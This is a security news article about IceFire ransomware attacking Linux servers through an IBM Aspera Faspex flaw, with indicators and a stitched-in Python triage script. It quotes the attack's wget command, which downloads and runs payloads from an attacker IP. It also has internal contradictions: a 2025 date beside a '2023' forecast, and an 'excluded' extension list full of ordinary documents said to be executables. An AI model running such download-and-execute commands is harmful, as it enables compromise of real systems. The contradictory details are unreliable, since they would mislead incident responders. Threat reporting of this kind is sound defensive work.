Friday, May 2, 2025

IceFire Ransomware Attacks Both Windows and Linux Enterprise Networks


Security analysts at SentinelOne recently reported on IceFire, an established ransomware family that has been found attacking both Windows and Linux enterprise networks.

An IceFire attack encrypts the victim's files and demands payment in exchange for the decryption key. Since it was first observed in 2020, the malware has caused a great deal of damage to both individuals' personal computers and the systems of large organizations.

In recent weeks, the operators have been deploying IceFire against Linux enterprise networks, a significant shift from its previous use against Windows-based networks. These attacks mainly target Linux systems that are exposed to the Internet.


IceFire Ransomware Linux & Windows

According to the analysis, the Linux version of IceFire is a 2.18 MB binary compiled with GCC for the AMD64 architecture:

  • SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973

A sample of IceFire was tested on Ubuntu and Debian, two Intel-based distributions, and ran successfully on both test systems. The compromised system downloaded two payloads with wget and saved them to /opt/aspera/faspex:

sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo

Exploiting the Flaw in IBM Aspera Faspex

Aspera Faspex file-sharing software contains a deserialization vulnerability tracked as CVE-2022-47986 that IceFire operators exploit to gain access to targets’ vulnerable systems and install ransomware payloads on them.

Around 150 Aspera Faspex servers are currently online, according to the Shodan database, most of which are located in the United States and China.

Linux has been found to be more challenging to deploy ransomware against than Windows, especially when it comes to large-scale deployments. 

To work around this, actors tend to exploit application vulnerabilities, as the IceFire operator demonstrated by deploying payloads through a vulnerability in IBM Aspera Faspex.

Hackers Are Targeting Linux

Linux-based systems are commonly used in enterprise settings to host databases, web servers, and other mission-critical applications.

Ransomware actors therefore often see these systems as more valuable targets than Windows-based computers, because a successful attack is likely to yield a higher payout than one against a typical Windows user.

Files and Folders Excluded

The sample contains a list of file extensions, referenced from its data segments, that are excluded from encryption because they belong to executables, applications, or system functionality.

Excluded Files:

.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx

Excluded Folders:

  • /boot: Data used at startup
  • /dev: Device files, drivers
  • /etc: System configuration files
  • /lib: Shared libraries that applications and the system link dynamically
  • /proc: Virtual filesystem exposing runtime information such as PIDs, mounted drives, and system configuration
  • /srv: Web server directories
  • /sys: Interface to the kernel; similar to /proc
  • /usr: User-level binaries and static data
  • /var: Dynamic data, e.g. caches, databases
  • /run: System information, including PID files; cleared on each reboot

Ransom Notes

IceFire embeds the ransom note into a binary resource that is dropped and written to each directory targeted for file encryption.

The ransom note includes a hardcoded username and password for logging into the ransom payment portal, hosted on a Tor hidden service at:

  • 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion
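The exclusion lists and the per-directory ransom note together determine where an incident responder should expect to find encrypted files and notes. The following is an added example, not the ransomware's code or anything from the article: it applies the article's extension and directory lists to a file inventory (for instance the output of `find / -type f` collected during response), separates encryption candidates from excluded files, and lists the directories in which a dropped note would be expected. The sample paths are constructed, and the case-insensitive extension match is an assumption the article does not state.

```python
"""Added example (not IceFire's code, not from the article): scope an IR
investigation using the exclusion lists the article quotes. Sample paths
are constructed; case-insensitive extension matching is an assumption."""
from pathlib import PurePosixPath

# Top-level directories the article lists as skipped.
EXCLUDED_DIRS = frozenset(
    ["/boot", "/dev", "/etc", "/lib", "/proc", "/srv", "/sys", "/usr", "/var", "/run"]
)

# Extension list quoted in the article.
EXCLUDED_EXTS = frozenset("""
.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back
.cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi
.odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib
.tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work
.xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf
.doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx
""".split())

def is_excluded_dir(path: str) -> bool:
    """True when the path's top-level directory is on the skip list.
    Whole path components are compared, so /usrdata is not mistaken for /usr."""
    parts = PurePosixPath(path).parts
    return len(parts) > 1 and "/" + parts[1] in EXCLUDED_DIRS

def is_excluded_ext(path: str) -> bool:
    """True when the file extension is on the skip list (case-insensitive; assumed)."""
    return PurePosixPath(path).suffix.lower() in EXCLUDED_EXTS

def in_scope(path: str) -> bool:
    """A file is an encryption candidate only if neither rule excludes it."""
    return not (is_excluded_dir(path) or is_excluded_ext(path))

def triage(paths):
    """Split an inventory into encryption candidates and excluded files with the reason."""
    candidates, excluded = [], {}
    for path in paths:
        if is_excluded_dir(path):
            excluded[path] = "directory"
        elif is_excluded_ext(path):
            excluded[path] = "extension"
        else:
            candidates.append(path)
    return candidates, excluded

def expected_note_dirs(paths):
    """Directories holding in-scope files: where a dropped ransom note would be expected."""
    return sorted({str(PurePosixPath(p).parent) for p in paths if in_scope(p)})

# Constructed inventory standing in for `find / -type f` output from an affected host.
SAMPLE_PATHS = [
    "/home/app/reports/q1.txt",
    "/home/app/reports/q1.xlsx",
    "/opt/aspera/faspex/uploads/contract.json",
    "/var/lib/postgresql/base/1234",
    "/usr/local/bin/tool",
    "/data/vm/disk.VMDK",
    "/srv/www/index.html",
    "/opt/aspera/faspex/uploads/backup.tar",
]

if __name__ == "__main__":
    candidates, excluded = triage(SAMPLE_PATHS)
    print("candidates:", candidates)
    print("excluded:", excluded)
    print("expected note directories:", expected_note_dirs(SAMPLE_PATHS))
```

Run against a real inventory, the candidate list tells a responder which directories to check first for encrypted files and notes, and the excluded set explains why system directories and backups such as .tar or .vmdk files may be intact while user data is not.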

This evolution of IceFire indicates that ransomware targeting Linux will continue to grow in popularity throughout 2023.

Deploying ransomware against Linux is much more difficult than against Windows, especially at scale.

The cybersecurity team at SentinelOne has done its best to provide all the essential details of the ransomware attack.


Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
